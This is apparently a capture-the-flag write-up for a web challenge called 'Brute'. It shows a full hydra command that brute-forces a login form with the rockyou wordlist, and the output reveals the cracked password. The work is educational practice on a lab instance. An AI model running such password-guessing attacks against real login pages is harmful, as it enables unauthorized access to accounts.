Brute

Overview

• Overall difficulty for me: Very easy

In this challenge, we can spawn a docker instance:

Find the flag

Home page:

Looks like we need to brute force the login page!

To do so, I’ll use hydra:

When we typed an incorrect password, it shows us Incorrect Password! error, and the POST request data is password=<password_here>.

Armed with this information, we can use hydra to brute force it:

┌──(root🌸siunam)-[~/ctf/GuidePoint-Security-Oct27-2022/Web/Brute]
└─# hydra -l 'any_user' -P /usr/share/wordlists/rockyou.txt 10.10.100.200 -s 37825 http-post-form "/:password=^PASS^:Incorrect Password"
[...]
[37825][http-post-form] host: 10.10.100.200   login: any_user   password: princess13

Find the password! Let’s login!

We found the flag!

Conclusion

What we’ve learned:

1. Brute Forcing HTTP Login Page via hydra